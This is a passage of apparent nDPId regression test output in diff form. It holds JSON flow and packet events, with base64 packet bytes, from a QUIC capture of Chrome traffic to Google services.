-00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clients2.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1621490940362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490940362,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEyFAAH4Roo00uxSvedF+ofgTAbsFTnxFzf8AAB0IX1A3NmSMbKUAAEU0xxudDjtwfHlFBOkIITOn8rvZxFm\/C93HCINJPVtiKR6bg4Mw7wQEXtiGHvHKsHQBCttPbgS\/hcDSxPOzux0V4CNQepSq2ytOhstQPNFgKqDi1D66h\/pG7BpGzCKPVnSY0j4mZfGHvp\/\/90uSi9bw7p+VzILVU3jM1Bfy+bJs20rNuK7sUwNxouBiolA43ulRiKtOrcMFSJUwryaJPuIF2AKADyLpYU6k7IhYp5pMSN\/FZrzaNP++MuPxUL0Gl5Navc20GBsGENjWTKPgIBn9sYhebGFEzStHKW0oRdWu4ecBWDSRteLnjvyRNfq+mu5PY+bv2BFXCrGw35UfLh\/YXxBUAy4mIdjLfzCt9VY3jAczlR6NzkXFtYCr4R8X++5lLCWyho9eGTf\/ZCpvdhXIm3YwXRQvz+kfxqnQsXH0ATnpdvEsAGru0CyioUbYBPhrlPL198KH2whWhbXpqJHFAyYFbpGDtS75d+ky3I7XtWANXuJ7DarmS3NZjP4Jf66vvGqKiJgy0KfGW+e7woGpFYzAoh4imK1VH8lIlaAurjJK0bKeBg9p5lFL0\/l+10ncgvPXDUuHlo46gy\/05jQ7pY9sWVusH8IwAbUs7+8XHTFa2n0Sk2BBs7cZpvTnwshZ+DP3ur5kokHk4A+vp7WHa4BbCLu22NtXJTp\/gQCajhA7U5McVzIVwwCkYzni+CTklGJudESK0dNwGzMjjvyh74BS8FP9wJoxjQxNp+QpBlr56o5vBkDintusd350CRIWzdRHfSgPIvr94nWDpXZFHV\/kTCtKuqDDbRIFJXgtJbMsMFk99XMXvWAVlDdMLwUFBCiheR0jEKmnOUGFAhtpeRaDYUitm6kQwBSlx494dMG4z7plhkyjgTRLdgMjGfgIdWdBxvKHIIvG3w\/V0evuN7rNPmv9HuOEitJrzJxpVhNZOoxAwLj9Luz46NCnQhKxi8RkJzyxHrjJop3lPAM0Y0bEhkOzTIRWf+t2hC8aA4KzaeLaWoCMRho1h3u3XPu3\/l6coc7iHJv\/2jzHV2f+8iGD+OQNMR9Kk99olUGh3yP6NJUA\/\/JOUUSZU3oe\/+nZqHPjXlf6UZ981hgrw2hFoCczDQltVQw8FOKd26NbN1UtWgiNS2G8T40NYIim1zBCFfKP9QB7fmPzHJDrqF9B2z8JCy2E76upD5NGPW077sVIvba7Ipr6QIRTGvvbV1\/tkhYCjTPxCUU
ENkB4qeC3g47G4DoEvoxNPUmX4lTntBxzxCUTgRTwb\/lKdC+a0EYxdtM5lRPHqXOg2W4+zkbzAvD981aa8cd3CUfbaiE3dmvVl8kAJBTvA7OBTRbFUiyh4hawpJaNoqqurTOZisggyEq8HET4+QxdAtFezeONkxyuzFSApfMDq9flcgmEnkCr0TO0tqKJC1OKWpkWpLnBiM8yAGqKTKylOg54gnFHgxTuPO66xLEKA8U9uUArvEv53MiMkmwlGJ\/R8DVYSi9lDGyVmqVbcb97csNgpSyaEAeipp\/xWQ9HZtumpN8oEgvCYnLsS2EfcfhO913KD0CEGNt5Eo4gSfP81+PQSvJvVrMAn8EG7DLqd7Bmv5BkyGG2JK8jhFljvgxwM6xjiPRsTShXGKbUG8XLhVXExbTQLftOfAo1ewb7oxiEPU8I+f46C5Ac4FzkNqV4H\/gd0P38BHG7LPoUUiE\/Ipgayi0qMMiXrV6TBl+UJmFlsYoY5\/mLRewMoSEzw4RRXooYehfNFw04DLhOfVWgmuS8w2oNaA6WV0z9"} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1621490941568,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490941568,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEyJAAH4Roow0uxSvedF+ofgTAbsFTkMYwP8AAB0IX1A3NmSMbKUAAEU0X3GLCKhQ\/kdXKlH1Uuvr7DsXc9kc2k0vey+LpKewCV3nDMgYTsbLcy\/hcOGbXOScP++l31aUJmaaSW7D3\/b1UKqaibOt1++jBKUGgHxvkHK7\/eIbPnk5lrlJGltbH1lVtjul90tjvoP2C0HGMu\/Q554\/zF5y3+m7JmZAmSjKD68m0IKoWfIlmy5OvxUjvqVj7fVNTGy8V9A8hysK+PthsdG2XbAGQ5r7jFZtgM2W0MUKS7M8fkDlpw6kLICW6or165\/Pu6sFJ\/29IWOcJLgCsF33hp\/eqp6x6\/ECLl+bLOD\/2ybV1zgfWcQJdeCTDlaBbs00YQsEWV3eNTSP1cAPrcHphduw9dFEMzdLujKMYP6qp9q4Kf9aga2dK4puh5Ip7GziQj98etOy\/ltXPqQDK0X0xvEFsMV40JSwj+BzoIGv4jugTdJl63HCP9wqVdO7OrAmKEFYkbeXK5P6pG8yzHXXppocSBsWVO97R55m5tJhwqTeKsPTGfmgkv+0mr+yMvQABbK3kL73O0HwPVgRMzkj11Hwldi1m3kxEtoBJnbHsAJyW4T4WEMuyY9xWOFILOzlsEWcW1DlkhujMuBrKf4HHbPFIfZA+vCGqVGuA9J49rsNTvkxJ3jjtUuvX02pDhaSBY2OTXYv5Dc54DTTkDjg2S7sEfptoW0pUxSNkWGCbPIP4xa+v0s6S\/mMMDwXP8kgPvEmHUDknP7JkED8bkUIL1Ho0AWHqdjSnc7aUc0tHV706qMXs0VyhEhojglXbeJLnekqAVF1dAyJGsOPr5QTKqiKuC+Sgj3UNOQ2AORLL3k0ntqV2x\/rHRdWLiJtPYEUBcvzUxECD7Dtnifc2AbiFM\/4baOlJluyckkIkfljDBVEu84m1Q2kmQPBLAgkcl7yWChrQ5E\/F60If6SMy
qrUlc2HMVvUBPZOd0Nsx8em3OcZz\/rd4dy5sR9B9SAkyfXIjPZat\/3SaduQsvQmjAvUkWJFmJcvwpcq2CHg3vveXbVE0PWJwxm31KUkGpdZBf0LnhThU3dnOeKxoMeUP496G60PKVdq7+Ev8OZxM4csxN6N9XOao2AmHwp\/0PfV0b+M6mCVlON4ySjH0zfT5CuS19JLsB0PAKCSWv6u5RSSSFK4\/9Pykim8KK8CSmoO+ZYYUWS5WpEmMsvK64DpcO9Wo88i\/G337OpXfoBIGbBcKqVJnkKYXTEBvx\/pOckc6mKqj1Xx2NLH9flt3AVKGz33q9V7vvj+2mpU\/AF2AYOC5QHoVhyHo4\/LUMEXlMibQL7QWDMM7oSFG9qo4z3Ogx0Id6yuIs2TTa0ezZqML11NC1X5955fIUW\/FDJcjZV8HB175+M7QL6IEWOOx6PZp1K\/RJlnO3heZacJYqauQwksZQsk4arIv6tCsj5ldWRpoqj3CLHPSNLlUOifs4ET+tW4OnRsMipebDJLpPBCJQJ+ecUpHtHbH+75\/d\/mWMiDQ\/hwUplHzhAjVMYLJSbAhbvEaR1IT2meCVIPAWn6ZyjG6gExtCbx+iUePUXL2hlrgzvBZ3GRHAOacsg6dN+CWQxwhWJB23q+MgzegfFEv2iEzXU8DkMvw\/RCwWjBr20X1FCOk795+lTgR3zGd9CF5postNEBPhGGGNxdqFYsot1FrVpwc5OqokbxkxTF7Onnq2kbbsl8Ba3XWkoGN76uWqzAZmzJNMK92Tdqpu1zazult+08ooXIuTRa2BfjyhJzhXLCrMQgn4QLV75o\/ppwW4gZ0PFwpLXpwmShzQ7nN6WnZ1Py"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621489064431,"flow_last_seen":1621489066532,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490941568,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621489064431,"flow_last_seen":1621489066532,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490941568,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1621490996100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490996100,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEIJAAH4Rpj00uxSvbKuKtt7qAbsFTlULzP8AAB0I1Car3PgqXoAAAEU0JJ9ZSJFnukw1kpIlerEIR7j54itrs6xKCGRE3XXR1FUvYtWiluVKkauej0mCgbfT49PWNVhv+d4PorlbwaCUuVogcoTaWUYfSMeQ7fvaCU5aGPhJnEWG\/0UBi1+8bCzq+SnypfTFmorq2dCk0qu92Ra50orfefmV0vtWsPEJimLpBfooWqbaEDaehfit7mw9dCNYCi1aruacDnpniKy5C0xID610oz+9TzXqtP6hBX3weUiK8Pyj6SMCZYEMLlvyFqwJB6JhFabZjNVmEjxtmGfFjrlmd8rGHWmhPpNKZDxUqmt5inD\/KBSwcSZjjZ2qVnYKFg9ZmE7YiJQNgNHdWnN0hvXaAF9t6UZJG6j5RLXjrewkAvkQDQHDpjvn0e4OB74XmU0f2pIRunZhG7nOdLrUIM3KYu4dp2SuvtBfXKF0JXJe4B3ipp\/HIXGxiIvxOuBhCV+try+l4\/ghPvYz4guxmwVL2sb1KOMYvw3AS2A9R7ISPdwCMEfNl0w7rnx7vKocBLncvhtDj6UswuytUe86VosZs6KpSu0MAgLJQtzS5mHMtRoQC8nFUX3y9GJ3tQdZReoRs5tT1J5QMG4ZaagK3Fd\/7M9x+E3FYrzzeGcDRtrRq5MMA4gADKTgaYZ+dKZMGdYo\/zPs253wfmTLUONNUPE7nq2Vqk53VySGDE\/2DUFu7Ouj4RcxQsyWQ5nTu01SZpQVMCdEN9s3guPRJHE1wvBDlg3bcsULX6ndUJQtoKpB8S6SxF27c5F4vK6k7cDGBUHNhgFGBvHbDK3DfXDpjwj7gg2cqNGRjyAQuR9PRICL7cb0AtSLaZUVEEj9LOfinX22qJNw3UF45DmfYo0\/JhJsSVJETL+9+\/IioFEWfh7SIpMVOu2RmSgEttov5swxPhIzuPvG+jIN04ml6r6sKlbwvgpbTGRWXVEqHBIQKz6hKZClZuSzSFKbsX49qdGXDM4XoODhPHLuRT3yh5r1JVnj7WHxhj3H5nD905qtU6bFJNe7n8l+D+uTJC\/IJu+kVyPQUWTIszeHcVgbabOXCOhKEJ2WtzLg7w+iaHi5LKjOT0MhRn4SMjHqY8gT6IdQh2dB8UwKaPz4N4HHltvk\/z2Y4L7mxeZ\/JjfG7JTmXTK6vTdjv9\/CAxmGhA\/wluaZ8tsrr5D+RdZPcXbEgBxH\/1tm6Bm6MpwP4YTSV9nxhIj0pGZHkpR+b2F4vl+nfENUZ5pReO94D4F\/RK66IESDjrP6tunmsMOMwn4+7B6QDDyOPDemTPrdF7zgJ+tY8975Y574Jc\/8yLBjbsC2ChrCxey35qrU\/vbhI34DkY7t8RrGmb3mWvKTS3qkB7Crk6DhnsUeTkGhVfg7A64U7ZiG4gBUQe7bIdSST2ngB6BSxxi3zRFk57obYhZOPoc3fWCo75KIToMVPMEYkIJx9+0YQlJeC5tnUyTEdxLueb2t5tk60+o+zEAOczUzzmu+Jg
JmBDQC3kS7OhExq2w8nBzzBuSHPPKcrZD8XdVFyl6v9hzq+F47wNZ22K27SHatestnBzU2FJkFSWgVWESWEb2tfRRceR37vbK\/bpqkp0cvwGojwVUlRemGqfylFPMQ1s+cnHj5sWbpZptO22YP\/G+CKfzf8pXSX7kzLdflxLF9DxVV+b83+nl+nTbj31vNDvGjXGswE6k3b\/905Liv2TlF0IzK2ZLVImonTHT6GswLKKIQ31p0M617FD3z1I3\/Kv2TR3RJaw4Ynkj4A5OuDN07n7PbCwGTm8j44Q\/2rqIeqilV"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1621490996403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490996403,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEJlAAH4RpiY0uxSvbKuKtt7qAbsFTmC3xf8AAB0I1Car3PgqXoAAAEU0S6ZfGd14S8A0NR1EXdOvvljTofNOsuBTESXKp4Oj7auLmC8B\/qxGB6ytk1wgcKgb4d567f76YrqqUml1MYVDe1C\/JvoI59\/gIk5MbkrAeINiJJmd4QeAnkVSzV5lCfOcg4X92GhM4oNiOV2dGGG19wmPo1+VUjHzShTUdyDHnnuZMliAzOjvbmXBN2aOzeCn+8K5drqRExq0cBsCHzvVRFUNzNlUUX5Vo+D387IvPpUHb7zmraw5XeiFvxl2Ta\/q5W5pNrCUAugz0iVIVuWVUNPV2x3FJywavW9Mc5JIWO8xXdlge6Szt9ygE3gMdi8fwLQb8lGW8vEcTE+N\/RkpReCzQ5xMfv355m1dCwCDmEbVqFEy+tHwxDIPuNe27WWgF9XSiasGS+4dfQwcg4ORYoMDpbfXKW92OUlTCH6yDwc7C78NrMUmisC5VK1mGGLaQ9Qu2wMRUqjdmNuepip5K0XNHR5BBbH81tXrZgvI7+1m6Yw0b4kZRl80WJwqq1KSBW4yOioR69+m2UjFAyV\/DXvz\/cExixYmUmVoRdQkJvqPEwdqKmYp83pX9N6Hd9bp8FjZiscO\/ylBmHeN2rawxJLrCx1pzuNkPlwJSuJasPINYSbw1F6JY3wUwxIeNBUcmrCmJuSJtdG7ayJElCjqeWPX8iOrtpJRyvIeNvVeP4zvOG+0xtaofbgfCwz76b84GmN17Mieoa5Bg0V+IoGD7eigcx4YglpTvHcQafiVJ+PIKzt1Fb+zraYPSsDdrlZP1w+1Hf31E\/7kXH56u8ayLXgMPnrISXGFMyS\/xokT7eAZHt\/LAzOJxdLaTDPem\/QunlwKxGvr7bmetIM3A6DNVEQjlmxo+VRIkbPBHlH8femG9JcYcQo9D76bkS1ct6T\/NMC38EOKjtDrrbwB6KP891J44T0TieukIbMdjtFWBM7IOVr8jksgPE25Qg1RWYJaofEPkp4D3UDLFQ3i3dbANJ4XVY\/+L6s+MFkMJ5vBF3bZcm\/tDpVfLrqBJT4nJ7a1C2yAYs59uuvaHev2cKOStPDQDjZlKsuGChOYfuICTD4igM9\/JcrG2yRYeOUCgKTyd394CO7u7YTQ5SxBzyztPmR1KbXNMGGetSQjaw1hK5VOfjJgPn+mSvHfGKivShlE7PanYf+wRwpAG4+iHQtJsjM6WclCAcVrZNfSob\/SYkmMNb3abOPObEQM2ceixo+VTcnp7HeKPVYD1y
bdnOMOXFC1AEz9wSofo6gTNdJjdRzlc\/9v7H9A4GsQFk2F7K54C2kPehQpa66BiqetQtr+UE\/dVFH6uNeScw+ulCv\/wbm+OBfrLZ2GXKql6eSDpcCVpn3MV2YEi5CgRFRyayz\/\/2woQgL8t+RxToNJ\/qQWCsxJMrThy97Ju4LAwWk5KeZaLwnxjsnunA1T99DyV8+UKz7+g5JIOC8ruYl8Cwc3nxBc+tvBSpA4ZcE9I+tZo34gvOtIq2Vp5LtGbyHij4LH40qk6nQ\/1gDcnTZVMAXlo9nJiRobqRR+5H3Sg6cc623xK2b9CkBfTTs2kJf1fvbYMbdZ+wEDmMqWAzs4QGCGgJ6e4avqUcQ0kS0cOgHx6IAe77IaK1bK2SrJc66FdwbVpj+\/3eUCOHhaAIGMeISGD7TNa3JfY6n0SkFubtUhSB0GUsv2j85xhlI1qeV+8UDynYcpwz8FIiKVdUIjfXcOGHLc9FJMKZ3XshDKwmNniXL0xT6RHfFQH3w8eQ\/YxCjcIE1MW2OGZs+3vB9wyULm8eiLTszw"} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1621490997006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490997006,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEJ5AAH4RpiE0uxSvbKuKtt7qAbsFTpBcyf8AAB0I1Car3PgqXoAAAEU0uA5YSqiRZv5\/DZhOTssoA0DPn9Zo4RXJotK44fYCvFiyrLXWkACavb445uJAej9D6NW8Y41y6KLu3pIKWD5qGNryyrX7YHITgUXix8iJo5DiSxsH3mGC2JahEYGf\/vTyPVMCyJZWsgerAn4HVFWRUh1qe82mrvrOfq6CMJqoDiP8vlj8+LrUV\/YTZtmYn9QGfS5vgZWX2txmg7RWFMQ+Rz2t3\/jIoTk1tBYJ8e4ItX4pZIW\/53Hyo2dcr4a7USRmF1tn8rKRC5HhXyRfxIBsmcteyC06JLk45KaIFQsqsO01ArTRBrqtXELj7tUE98y6lWlRh8r4yikeZefWhfGlnFB8GF6ugo6zdES7YXjYS9WA652moLPIYC0HZ4SbnVpSbRSuHeIGE5Lu9G6Sue9cSsIYF+Q+QkYSmgthm63nN\/pLWKoU\/RnLDJHaaN+LMsKEUL21PxpA47xYiNZr99R5HeRxIrMGueLrYGdwS\/9Macb\/Jur9jEdINRcxOqvE\/Oky1YBxT9EEdmvl8xfSzGRV6EJ2dO8C3TxvmALVJdJg7\/+XmVlc7vdVkE++7sw3O91FGcYlrdAT8TCgEm4OjsLPi5Cp+NhDUd9lNsblGNPne2oWas4b8C2P\/tYyZf+gOvHLJV3qKtY1q\/qcAcDlCTflHkKqb\/f8vTpeSKwdug8\/WMPk7J7GuRqkfSiRUAHrQP9z8Ev0mxBjmR0hdyQhsJrq6NDbkZA40SjV4PLS6wDFjRKFILwhocOA59yklQQ9oYMwuJzmXLKwLrh5mOeO7SiIFPGV64mweKEGNBwsPL73yemcdr\/l7ci\/aRkjgroHfTOlRVNlwd2SMp6acpgJ3DUTPihyMBDSlBSCN3TpbTHi0mhLZV3VnRkGCjGLPs2dQwR+\/NHoWbG\/mkxOp1+Yw2
+oGEApO7eTCrPIrMzOJPwIOKL240s+7ngQuSxGGK0TJiP\/b3U0+u65ktYKEIhmHd4NjqdknH73Qe9XAd2ZIJ7fI1HZmpgWCSTOYqlCtKfFnEWXjld7ZMR2bys1tpSPgypDIWux8kmWABvn28paMZ5649uFQ9tMCjlecEV\/1g+ERbp+wKDLmdogOcIzxg0M+JAJaffVX3DrOnA+A+uSiEkyKncq2c\/YTqK9cI\/JDh0JxfqNhsxmMlnwuAaJuPcBh1lD\/B3Q54dORDqCAw\/xIL5UovaES4PJSfmtHs56ItrSO911ZuIm9uOZr63ZoEcTfsynRQRr4UugAwprRYIoFK07lwdRcDiV67g2XdWXRwtNjWXsWfQGHKiNcbvetslRKrXfxyaa5qn6SEG2C2SnYaRGY3a99\/8awO5F2Qpe+vbycKzEN3ueNUgtD8y92W1XtG2C78GhMCEI1RPYj1pzZhzbrlJRrm5YT3D\/l8R+fQYCAtmrdD+CkceZwNpPKhEhVavI5Gp5XwNdJ56+RbVOrxDRVmjqTRPLg4zuWj2jEJ79chsV5GX2UrMGDWSjjSZAsWp9Mx4ndt6VUOFZip\/9r4MKmJiO7yGxG8d3B8CM0gf2O3UIBZEchmXjqS2T2\/ewwSSDqYn23knX\/nt\/rnNzky3YHLXA2PXQsFtsr2gSewQ8lu4K9Abfu98oJmGOqB6Zepl6y2WwgW1oaL73FaoUE77CPUfZc3ThUmYcus+PH3momVuo6wjeidlhQHQcAxWy2EczheDpK4PInZZTQH8B9cl87zWeaY26xiBO6\/KO4jcBhP55bEZTsGd\/GDBTnrzlfHI8ia0xyN1XOyklzBDoPTS\/1FjAcpdn"} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":103,"packets-processed":102,"total-skipped-flows":0,"total-l4-payload-len":137700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":69,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":69,"total-idle-flows":66,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":312,"global_ts_msec":1621492846202} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1621492846202,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621492846202,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYMxAAH4RSx80uxSvxPU9QM0gAbsFTsrvwv8AAB0IkN0D0fi2gP0AAEU0WPLbpHtkRhjnBwYFLsQ0oBVcuOZxPwKAEGEgwAlTMTXTGM71v6BXkNyXBiiValVwFjUYX7UUrk+V5Jrupcy7Obpi2i00t8odJApt+XitfLuiix1t0F7z5Z+feBpcusmj2sOZ6QR6h9W++LWKulARwr2neypk4oGapBa+NsiNweTRdbMX3O4d\/mwfllanHZjdO6qyaQ7CnGSuCulGekhpihqBGXPcLW0di3I9pvTqznFG9kWmS8ORGWf1J8GUtGc5VJSaNCJ+Fec43BTOm1+MS\/j4zGK08zpEpGVcAuP60NQcXU9UkzZKsPw3ZWurcWQhQRUUG2hZnMieZ2iH9C8vVNFBjN\/04FbVKM4mZrWJT1lug\/jBAePvCTNRYXmLxN9Ou++HC02AMJ57sWcEhMIYguKuFYuR7dxPfL+cTW1koRSS6BsFC4n5ZRuwmsUcF9vfJPEIqvBwmCjtVhhf7VD5goH9tVyYF8KO3kIv28uMuxWcK+q6wT8hSJ\/zEHzootumo7aXQqZvFeJhyCX0EfLhJ23vbRO9FmugxWN7m4sTU7Fhf9kalJr+3D134oZ9EEYm2k3laLxJs0+YOmna+6\/rVscNjjUad0DFGPUlfBEWehyhkygQSnAC64dHYrDv0iBrOmlJ6MRSwFxUrKXnUfq3k6Sjz27UeFDKAbXjm9pfn3JaqYN+iEPqCI6LxBiewwQo6PhkrbmioOgwvX\/DmpJRnPyUe5tKPfpj591HlcbD1wj8IAwgpQiAbJmWGX26TQVGc\/oGu0wUuxxgG3S0COr+VKnO615jbylfYmabj0+tV2Uo1TdMmuzr4pfQWFOvIgEzWzlgauVuFGrxV
